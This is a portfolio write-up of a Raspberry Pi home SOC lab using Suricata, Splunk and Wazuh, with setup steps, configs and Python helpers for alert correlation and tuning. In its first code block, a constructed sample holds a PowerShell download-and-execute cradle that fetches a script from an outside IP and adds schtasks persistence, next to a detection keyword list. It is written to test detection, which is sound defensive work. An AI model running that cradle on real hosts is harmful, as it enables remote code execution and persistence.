Tags: Suricata IDS · Splunk SIEM · Wazuh HIDS · Raspberry Pi · Blue Team

Home Mini-SOC Lab

A production-grade Security Operations Center on a Raspberry Pi Zero 2 W — Suricata IDS feeding structured EVE JSON into Splunk Enterprise. Real alerts. Real detections.

November 2025 · Network: 10.0.0.0/24 · 1 documented IR
30k+ active Suricata detection rules · ~40% alert reduction after tuning · 10k+ daily events indexed · 42 min detection to containment · 6 custom Splunk dashboards
01. Project Overview

A production-grade home Security Operations Center built on a Raspberry Pi Zero 2 W. Suricata IDS runs on the Pi, inspecting the LAN traffic the router mirrors to it (or passes through it inline) and writing structured EVE JSON logs. rsyslog tails those logs and forwards each line over TCP to a Splunk Enterprise instance on a Windows PC, where custom dashboards surface alerts, DNS queries, suspicious IPs, and protocol anomalies in near real time. Wazuh HIDS on the same Windows host (WIN-LAB-01) supplies the host-side signal that Splunk correlates with the network alerts.

This lab produced a real documented detection — a PowerShell-based fileless attack caught and contained in 42 minutes. See the Incident Response writeup →

"Real detections from a $15 Pi. The SOC doesn't need to be enterprise-grade to catch real threats — it needs to be tuned, monitored, and correlated."

REAL DETECTION — Dec 10, 2024
The Lab Caught a Live Attack

Wazuh Rule 91816 fired on WIN-LAB-01 at 14:23:17 EST. Encoded PowerShell execution detected — IEX download chain plus schtasks persistence, all obfuscated in Base64. Suricata simultaneously caught the C2 callback attempt over HTTP to 185.220.101.42 (AbuseIPDB: 100/100). The SOC saw both signals before the attacker could establish a foothold.

Time to detection: 2m 15s · Detection to containment: 42 min · Data sources correlated: 3

ATTACK CHAIN: Suricata (network C2) + Wazuh (host HIDS) + Splunk (correlation) gave the complete picture. No single tool caught it alone.
Read Full IR Writeup →
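The host-plus-network join behind the callout above, as an added example that is not the lab's Splunk search and uses none of its real logs: it decodes a `-EncodedCommand` argument the way an analyst does during triage (base64, then UTF-16LE), flags the cradle and persistence keywords, and pairs a Wazuh alert with Suricata alerts from the same host to a public destination within a five-minute window. The Wazuh and EVE records, the agent IP 10.0.0.42, the sample script and the local-range signature IDs are all constructed for the example.

```python
import base64
import ipaddress
import json
from datetime import datetime, timedelta

# Constructed sample of the script type the callout describes (IEX download cradle
# plus schtasks persistence), encoded the way `powershell -EncodedCommand` expects:
# UTF-16LE text, then base64. Not the payload from the real incident.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://185.220.101.42/a.ps1'); "
    "schtasks /create /sc onlogon /tn Updater /tr powershell.exe"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed Wazuh alerts.json record; field layout follows Wazuh's output,
# the agent IP and rule level are assumptions.
WAZUH_LINES = [json.dumps({
    "timestamp": "2024-12-10T14:23:17.412-0500",
    "rule": {"id": "91816", "level": 12, "description": "Encoded PowerShell command"},
    "agent": {"name": "WIN-LAB-01", "ip": "10.0.0.42"},
    "data": {"win": {"eventdata": {"commandLine": f"powershell.exe -enc {SAMPLE_ENCODED}"}}},
})]

# Constructed Suricata EVE records: the C2 alert, two internal-only alerts,
# one unrelated alert 27 minutes later, and a non-alert DNS event.
SURICATA_LINES = [json.dumps(e) for e in [
    {"timestamp": "2024-12-10T14:23:19.801217-0500", "event_type": "alert", "src_ip": "10.0.0.42",
     "dest_ip": "185.220.101.42", "dest_port": 80, "proto": "TCP",
     "alert": {"signature_id": 1000001, "signature": "LOCAL sample C2 callback (constructed)", "severity": 1}},
    {"timestamp": "2024-12-10T14:23:05.000000-0500", "event_type": "alert", "src_ip": "10.0.0.25",
     "dest_ip": "10.0.0.153", "dest_port": 53, "proto": "UDP",
     "alert": {"signature_id": 1000002, "signature": "LOCAL internal DNS chatter (constructed)", "severity": 3}},
    {"timestamp": "2024-12-10T14:23:18.000000-0500", "event_type": "alert", "src_ip": "10.0.0.42",
     "dest_ip": "10.0.0.153", "dest_port": 53, "proto": "UDP",
     "alert": {"signature_id": 1000002, "signature": "LOCAL internal DNS chatter (constructed)", "severity": 3}},
    {"timestamp": "2024-12-10T14:50:00.000000-0500", "event_type": "alert", "src_ip": "10.0.0.42",
     "dest_ip": "198.51.100.7", "dest_port": 443, "proto": "TCP",
     "alert": {"signature_id": 1000004, "signature": "LOCAL unrelated later alert (constructed)", "severity": 2}},
    {"timestamp": "2024-12-10T14:23:21.000000-0500", "event_type": "dns", "src_ip": "10.0.0.42",
     "dest_ip": "10.0.0.153", "proto": "UDP", "dns": {"type": "query", "rrname": "example.com", "rrtype": "A"}},
]]

SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String", "schtasks")


def parse_ts(value):
    """Both Wazuh and Suricata write ISO-8601 with a numeric offset (e.g. -0500)."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")


def encoded_blob(command_line):
    """Return the argument after -e/-enc/-EncodedCommand (PowerShell accepts any
    unambiguous prefix of the switch), or None if the command is not encoded."""
    parts = command_line.split()
    for i, p in enumerate(parts[:-1]):
        if len(p) >= 2 and "-encodedcommand".startswith(p.lower()):
            return parts[i + 1]
    return None


def decode_encoded_command(blob):
    """Reverse -EncodedCommand: base64 -> UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16-le")


def suspicious_tokens(script):
    """Case-insensitive keyword check used for triage, in SUSPICIOUS order."""
    low = script.lower()
    return [t for t in SUSPICIOUS if t.lower() in low]


def correlate(wazuh_lines, eve_lines, window=timedelta(minutes=5)):
    """Join each host alert to network alerts from the same host to a public
    destination within `window`; one dict per correlated (host, network) pair."""
    eve_alerts = [e for e in map(json.loads, eve_lines) if e.get("event_type") == "alert"]
    incidents = []
    for w in map(json.loads, wazuh_lines):
        host_ip, t0 = w["agent"]["ip"], parse_ts(w["timestamp"])
        cmd = w.get("data", {}).get("win", {}).get("eventdata", {}).get("commandLine", "")
        blob = encoded_blob(cmd)
        script = decode_encoded_command(blob) if blob else cmd
        for e in eve_alerts:
            if e["src_ip"] != host_ip or ipaddress.ip_address(e["dest_ip"]).is_private:
                continue  # different host, or lateral/internal traffic: not a C2 candidate here
            delta = parse_ts(e["timestamp"]) - t0
            if abs(delta) <= window:
                incidents.append({
                    "host": w["agent"]["name"], "host_rule": w["rule"]["id"],
                    "dest_ip": e["dest_ip"], "dest_port": e["dest_port"],
                    "signature": e["alert"]["signature"],
                    "seconds_apart": round(delta.total_seconds(), 1),
                    "decoded_tokens": suspicious_tokens(script),
                })
    return incidents


if __name__ == "__main__":
    print(json.dumps(correlate(WAZUH_LINES, SURICATA_LINES), indent=2))
```

The two internal alerts from 10.0.0.42 drop out on the `is_private` check and the 14:50 alert drops out on the window, so only the C2 callback survives. In Splunk the same join is a search over `index=wazuh` and `index=suricata` keyed on the host IP with a time bucket; the Python version is the reference a practitioner can run offline to check the logic before writing the SPL.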
02. Architecture
┌─────────────────────────────────────────────────────┐
│ Home Network 10.0.0.0/24                            │
│                                                     │
│   [Laptop]   [Phone]   [IoT]   [Smart TV]           │
│       │         │        │         │                │
│       └─────────┴────────┴─────────┘                │
│                      │                              │
│              [Router 10.0.0.1]                      │
│                      │ (mirror / inline)            │
│       ┌──────────────▼──────────────┐               │
│       │ Raspberry Pi 10.0.0.153     │               │
│       │ Suricata IDS (EVE JSON)     │               │
│       │ Pi-hole DNS Sinkhole        │               │
│       │ rsyslog → TCP :1514         │               │
│       └──────────────┬──────────────┘               │
│                      │                              │
│       ┌──────────────▼──────────────┐               │
│       │ Windows PC                  │               │
│       │ Splunk Enterprise 9.x       │               │
│       │ Wazuh HIDS (WIN-LAB-01)     │               │
│       │ 6 custom dashboards         │               │
│       └─────────────────────────────┘               │
└─────────────────────────────────────────────────────┘
03. Technical Specifications
IDS HARDWARE
  • Raspberry Pi Zero 2 W
  • 32 GB MicroSD (Class 10)
  • 5V / 2.5A power supply
  • Static IP: 10.0.0.153
IDS SOFTWARE
  • Raspberry Pi OS Lite
  • Suricata 6.x / 7.x
  • ET Open Ruleset (30k+ rules)
  • rsyslog (TCP port 1514)
SIEM PLATFORM
  • Splunk Enterprise 9.x
  • Windows 10/11 host
  • TCP input port 1514
  • Source type: _json
PERFORMANCE
  • <100 ms detection latency
  • <0.1% packet loss
  • 30–50% CPU utilisation
  • ~15 GB / 30-day index
04. How the SOC Was Built

Six phases from bare hardware to a production-ready detection pipeline.

PHASE 01 — HARDWARE
Raspberry Pi OS, static IP, essentials
Flash Raspberry Pi OS Lite, configure static IP via nmtui, install network and monitoring tools. Disable unnecessary services — the Pi runs headless, IDS-only.
PHASE 02 — IDS ENGINE
Suricata installed from a current package source
Install Suricata from the OISF PPA to get a current build on Ubuntu. Note that the PPA targets Ubuntu releases; on Raspberry Pi OS Lite, which is Debian-based, the equivalent is the distribution package, or the newer build from Debian backports when a current version is needed. Pull the Emerging Threats Open ruleset via suricata-update: 30,000+ rules covering malware C2, exploits, and protocol anomalies.
PHASE 03 — LOG FORMAT
EVE JSON: structured output for every event type
Configure suricata.yaml to capture on eth0 (af-packet) and write EVE JSON. Enable the event types the dashboards need: alert, HTTP, DNS, TLS, SSH, flow. Because every record is a self-contained JSON object, Splunk extracts the fields without a custom parser.
PHASE 04 — LOG SHIPPING
rsyslog tails EVE JSON and ships it to Splunk TCP 1514
Configure rsyslog's imfile module to tail /var/log/suricata/eve.json and forward each line over TCP to the Windows PC. inotify mode gives sub-second forwarding latency. Two details matter on the Splunk side: forward the bare JSON line through a custom template, because rsyslog's default forward format prepends a syslog header that the _json source type cannot parse, and raise rsyslog's 8 KiB default message size so long http and tls records are not truncated into invalid JSON.
PHASE 05 — SIEM
Splunk TCP input, custom index, 6 dashboards built
Create a dedicated suricata index in Splunk, configure TCP input on port 1514 with source type _json. Build 6 dashboards surfacing alert distribution, top signatures, DNS analysis, HTTP traffic, suspicious IPs, and protocol breakdown.
PHASE 06 — TUNING
~40% alert reduction over 3-week observation period
The ET Open ruleset fires on many benign home-network patterns. Suppress noisy scanner signatures and known-safe traffic via threshold.conf. Over 3 weeks, daily alert volume dropped from ~120 to ~72 — leaving only actionable signals.
05. Implementation
STEP 01 — RASPBERRY PI SETUP
Base OS, static IP, essential tools
Flash Raspberry Pi OS Lite, configure static IP via nmtui, install essentials.
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y vim htop net-tools tcpdump curl
# Set static IP via nmtui then verify:
ip -4 addr show eth0
STEP 02 — INSTALL SURICATA
IDS engine from a current package source
On Ubuntu, install via the OISF PPA to get a current build; on Raspberry Pi OS Lite (Debian-based) the PPA does not apply, so use the distribution package or Debian backports. Then verify the build and pull the ET Open ruleset.
# Ubuntu hosts: OISF PPA
sudo apt install -y software-properties-common
sudo add-apt-repository -y ppa:oisf/suricata-stable
sudo apt update
sudo apt install -y suricata
# Raspberry Pi OS Lite (Debian): distro package, or a newer build from backports
# if the backports repo is enabled:
#   sudo apt install -y suricata
#   sudo apt install -y -t bookworm-backports suricata
suricata --build-info | grep "Suricata version"
sudo suricata-update             # pull ET Open rules into /var/lib/suricata/rules/suricata.rules
sudo systemctl restart suricata  # load the freshly pulled ruleset
STEP 03 — CONFIGURE EVE JSON LOGGING
Structured JSON output for every event type
Edit /etc/suricata/suricata.yaml to enable EVE JSON and set the monitored interface.
# In suricata.yaml:
af-packet:
  - interface: eth0
    cluster-id: 99
    cluster-type: cluster_flow

outputs:
  - eve-log:
      enabled: yes
      filetype: regular
      filename: /var/log/suricata/eve.json
      types:
        - alert
        - http
        - dns
        - tls
        - ssh
        - flow

sudo suricata -T -c /etc/suricata/suricata.yaml   # validate the config before restarting
sudo systemctl restart suricata
sudo tail -f /var/log/suricata/eve.json
STEP 04 — RSYSLOG FORWARDING TO SPLUNK
Ship EVE JSON from Pi to Splunk over TCP 1514
Create /etc/rsyslog.d/30-suricata.conf. The template is what makes Splunk's _json source type work: without it rsyslog sends "<PRI>timestamp host tag {json}", and the header breaks JSON parsing. The size increase stops long EVE records (http, tls) being cut at rsyslog's 8 KiB default.
# Ideally at the top of /etc/rsyslog.conf, before any input module is loaded
global(maxMessageSize="64k")

module(load="imfile" mode="inotify")

# Forward only the message body, i.e. the bare EVE JSON line
template(name="eve-raw" type="string" string="%msg%\n")

ruleset(name="suricata-fwd") {
    action(type="omfwd" target="10.0.0.XXX" port="1514" protocol="tcp"   # Windows PC IP
           template="eve-raw")
}

input(type="imfile"
      File="/var/log/suricata/eve.json"
      Tag="suricata"
      Severity="notice"
      Facility="local6"
      ruleset="suricata-fwd")

sudo rsyslogd -N1            # syntax-check the config
sudo systemctl restart rsyslog
# Test connectivity with a JSON line so the test event parses in Splunk:
echo '{"event_type":"test","msg":"rsyslog path check"}' | nc -w1 10.0.0.XXX 1514
STEP 05 — SPLUNK DATA INPUT
Receive and index EVE JSON in Splunk
In Splunk Web: Settings → Data Inputs → TCP → New. Configure the input to receive on port 1514 and parse as JSON.
  • Port: 1514
  • Source type: _json
  • Index: suricata (create new)
# Verify data is arriving:
index=suricata | head 5 | table _time, event_type, alert.signature
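What actually arrives on port 1514, and why the line format matters, as an added example (not the lab's code and not Splunk's parser): `ingest` classifies each received line as bare JSON, syslog-wrapped JSON (what rsyslog's default forward format produces) or unparseable (what a long record cut at rsyslog's 8 KiB default looks like), and `summarize` builds the counts the first dashboards display. Splunk's _json source type expects each event to be a JSON document, so the "wrapped" and "unparseable" counters are the two failure modes to check for when the verify search above shows events but no extracted fields. The EVE records and the rsyslog header are constructed.

```python
import json
from collections import Counter

# Constructed EVE records (not lab data) covering the event types the pipeline enables.
EVE_EVENTS = [
    {"timestamp": "2024-12-10T14:23:19.801217-0500", "event_type": "alert", "src_ip": "10.0.0.42",
     "dest_ip": "185.220.101.42", "dest_port": 80, "proto": "TCP",
     "alert": {"signature_id": 1000001, "signature": "LOCAL sample C2 callback (constructed)", "severity": 1}},
    {"timestamp": "2024-12-10T14:23:20.000000-0500", "event_type": "alert", "src_ip": "10.0.0.25",
     "dest_ip": "10.0.0.153", "dest_port": 53, "proto": "UDP",
     "alert": {"signature_id": 1000002, "signature": "LOCAL internal DNS chatter (constructed)", "severity": 3}},
    {"timestamp": "2024-12-10T14:23:21.000000-0500", "event_type": "dns", "src_ip": "10.0.0.25",
     "dest_ip": "10.0.0.153", "proto": "UDP", "dns": {"type": "query", "rrname": "example.com", "rrtype": "A"}},
    {"timestamp": "2024-12-10T14:23:22.000000-0500", "event_type": "dns", "src_ip": "10.0.0.42",
     "dest_ip": "10.0.0.153", "proto": "UDP", "dns": {"type": "query", "rrname": "example.com", "rrtype": "A"}},
    {"timestamp": "2024-12-10T14:23:23.000000-0500", "event_type": "http", "src_ip": "10.0.0.42",
     "dest_ip": "185.220.101.42", "proto": "TCP",
     "http": {"hostname": "185.220.101.42", "url": "/a.ps1", "http_method": "GET", "status": 200,
              "http_user_agent": "Mozilla/5.0 (Windows NT 10.0) WindowsPowerShell/5.1 (constructed)"}},
    {"timestamp": "2024-12-10T14:23:24.000000-0500", "event_type": "tls", "src_ip": "10.0.0.25",
     "dest_ip": "198.51.100.7", "proto": "TCP", "tls": {"sni": "example.net", "version": "TLS 1.3"}},
    {"timestamp": "2024-12-10T14:23:25.000000-0500", "event_type": "flow", "src_ip": "10.0.0.25",
     "dest_ip": "198.51.100.7", "proto": "TCP", "flow": {"pkts_toserver": 8, "pkts_toclient": 6}},
]
BARE_LINES = [json.dumps(e) for e in EVE_EVENTS]


def rsyslog_wrap(line, pri=181, host="pi"):
    """Approximates rsyslog's default forward format, "<PRI>timestamp host tag msg",
    which is what Splunk receives when no template is set. PRI 181 is facility
    local6 (22*8) plus severity notice (5)."""
    return f"<{pri}>Dec 10 14:23:19 {host} suricata {line}"


WRAPPED_LINES = [rsyslog_wrap(l) for l in BARE_LINES]

# An http record padded past rsyslog's 8 KiB default message size, cut where
# rsyslog would cut it: the JSON object never closes.
BIG_EVENT = dict(EVE_EVENTS[4], http=dict(EVE_EVENTS[4]["http"], http_user_agent="A" * 9000))
TRUNCATED_LINE = rsyslog_wrap(json.dumps(BIG_EVENT))[:8192]


def classify(line):
    """Return ('bare', event), ('wrapped', event) or ('unparseable', None)."""
    try:
        return "bare", json.loads(line)
    except ValueError:
        pass
    start = line.find("{")
    if start >= 0:
        try:
            return "wrapped", json.loads(line[start:])
        except ValueError:
            pass
    return "unparseable", None


def ingest(lines):
    """Parse every received line; return (events, stats) where stats counts the
    three classes. Anything but 'bare' means the forwarding config needs fixing."""
    stats, events = Counter(), []
    for line in lines:
        kind, event = classify(line)
        stats[kind] += 1
        if event is not None:
            events.append(event)
    return events, stats


def summarize(events, top=5):
    """The aggregates behind the event-type, top-signature, DNS and HTTP dashboards."""
    return {
        "event_types": dict(Counter(e["event_type"] for e in events)),
        "top_signatures": Counter(e["alert"]["signature"] for e in events
                                  if e["event_type"] == "alert").most_common(top),
        "top_dns": Counter(e["dns"]["rrname"] for e in events
                           if e["event_type"] == "dns" and e["dns"].get("type") == "query").most_common(top),
        "user_agents": Counter(e["http"].get("http_user_agent", "-") for e in events
                               if e["event_type"] == "http").most_common(top),
    }


if __name__ == "__main__":
    for name, lines in (("bare", BARE_LINES), ("wrapped", WRAPPED_LINES), ("truncated", [TRUNCATED_LINE])):
        events, stats = ingest(lines)
        print(name, dict(stats))
    print(json.dumps(summarize(ingest(BARE_LINES)[0]), indent=2))
```

`classify` recovers the JSON from a wrapped line by skipping to the first brace, which is fine for a local check but not something to rely on in production: fix the forwarder so that every line lands as "bare", and treat any "unparseable" count as a message-size problem on the rsyslog side.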
STEP 06 — ALERT TUNING
Reduce alert volume from ~120 to ~72 daily
The Emerging Threats Open ruleset fires on many benign home-network patterns. Suppressing noisy scanner signatures and known-safe traffic reduces daily alert volume by ~40%, leaving only actionable signals. Tuning was done over a 3-week observation period.
# Example: suppress one noisy signature when the source is on the home LAN.
# gen_id/sig_id identify the rule; "track by_src, ip" scopes the suppression so
# the same signature still fires for sources outside 10.0.0.0/24.
# In /etc/suricata/threshold.conf:
suppress gen_id 1, sig_id 2013028, track by_src, ip 10.0.0.0/24
# Apply with a rule reload instead of a full restart:
# sudo suricatasc -c reload-rules
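Replaying alerts through threshold.conf before editing it on the Pi, as an added example (not Suricata's own threshold code): a small parser for `suppress` lines (the only directive handled here; `threshold` lines raise) and a function that reports the reduction a set of suppressions gives over a batch of EVE alerts. It exists mainly to check scoping: a suppression with `track by_src, ip 10.0.0.0/24` must keep the same signature when the source is outside the LAN. The threshold file, alert lines and signature IDs are constructed.

```python
import ipaddress
import json
import re
from collections import Counter

# Constructed threshold.conf: one scoped suppression, one rule-wide suppression.
THRESHOLD_CONF = """
# noisy internal DNS signature: ignore it for LAN sources only
suppress gen_id 1, sig_id 1000002, track by_src, ip 10.0.0.0/24
# scanner probe signature: silence entirely
suppress gen_id 1, sig_id 1000003
"""

SUPPRESS_RE = re.compile(
    r"^suppress\s+gen_id\s+(\d+),\s*sig_id\s+(\d+)"
    r"(?:,\s*track\s+(by_src|by_dst|by_either),\s*ip\s+(\S+))?\s*$"
)


def parse_threshold(text):
    """Parse suppress lines into dicts; raise on anything else so a typo is caught
    here rather than at Suricata reload time."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUPPRESS_RE.match(line)
        if not m:
            raise ValueError(f"unsupported threshold line: {line}")
        gid, sid, track, ip = m.groups()
        rules.append({"gid": int(gid), "sid": int(sid), "track": track,
                      "net": ipaddress.ip_network(ip, strict=False) if ip else None})
    return rules


def suppressed(alert, rules):
    """True if any suppression matches this EVE alert event."""
    a = alert["alert"]
    for r in rules:
        if (a.get("gid", 1), a["signature_id"]) != (r["gid"], r["sid"]):
            continue
        if r["net"] is None:
            return True  # rule-wide suppression
        addrs = {"by_src": [alert["src_ip"]], "by_dst": [alert["dest_ip"]],
                 "by_either": [alert["src_ip"], alert["dest_ip"]]}[r["track"]]
        if any(ipaddress.ip_address(x) in r["net"] for x in addrs):
            return True
    return False


def apply_tuning(eve_lines, rules):
    """Replay alert events through the suppressions; return before/after counts,
    the reduction percentage and the surviving per-signature counts."""
    alerts = [e for e in map(json.loads, eve_lines) if e.get("event_type") == "alert"]
    kept = [a for a in alerts if not suppressed(a, rules)]
    pct = round(100 * (1 - len(kept) / len(alerts)), 1) if alerts else 0.0
    return {"before": len(alerts), "after": len(kept), "reduction_pct": pct,
            "remaining": Counter(a["alert"]["signature"] for a in kept).most_common()}


def alert_line(sid, signature, src, dst):
    """Constructed EVE alert record in the shape Suricata writes."""
    return json.dumps({"timestamp": "2024-12-10T14:23:19.000000-0500", "event_type": "alert",
                       "src_ip": src, "dest_ip": dst, "dest_port": 80, "proto": "TCP",
                       "alert": {"gid": 1, "signature_id": sid, "rev": 1,
                                 "signature": signature, "severity": 2}})


# Constructed day of alerts: 10 events, of which 4 should be suppressed.
ALERT_LINES = (
    [alert_line(1000002, "LOCAL internal DNS chatter (constructed)", "10.0.0.25", "10.0.0.153")] * 3
    + [alert_line(1000002, "LOCAL internal DNS chatter (constructed)", "203.0.113.5", "10.0.0.153")]
    + [alert_line(1000003, "LOCAL scanner probe (constructed)", "10.0.0.1", "10.0.0.153")]
    + [alert_line(1000001, "LOCAL sample C2 callback (constructed)", "10.0.0.42", "185.220.101.42")] * 2
    + [alert_line(1000004, "LOCAL curl user-agent outbound (constructed)", "10.0.0.30", "198.51.100.7")] * 3
)

if __name__ == "__main__":
    print(json.dumps(apply_tuning(ALERT_LINES, parse_threshold(THRESHOLD_CONF)), indent=2))
```

Run it against a day's worth of real alert lines (`grep '"event_type":"alert"' eve.json`) to see what a candidate threshold.conf would leave, and keep an eye on the "remaining" list: if a high-severity signature disappears, the suppression is scoped too widely.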
06. Splunk Dashboards

Six custom dashboards built to surface different layers of the network picture:

01. Event type distribution: alert vs. DNS vs. HTTP vs. flow by count
02. Top 20 alerts (last 24h): ranked by Suricata signature name
03. DNS query analysis: top queried domains, blocked domains from Pi-hole
04. HTTP traffic: hostnames, methods, user-agents, response codes
05. Suspicious IPs: filtered by alert severity, enriched with geolocation
06. Protocol breakdown: event filtering by TCP/UDP/ICMP/DNS/TLS
07. Detection Capabilities
PROTOCOL ANALYSIS
DNS tunneling & DGA detection
HTTP suspicious user-agents
TLS certificate anomalies
SSH brute-force patterns
THREAT CATEGORIES
Malware C2 callbacks
Exploit & vulnerability scan attempts
Data exfiltration patterns
Lateral movement indicators
08. Privacy & Data Handling
All screenshots and log samples shared publicly have been sanitised: internal IP addresses masked, domain names of non-malicious hosts redacted, and no personally identifiable information included. Suricata EVE JSON logs remain local to the home network and are not uploaded anywhere.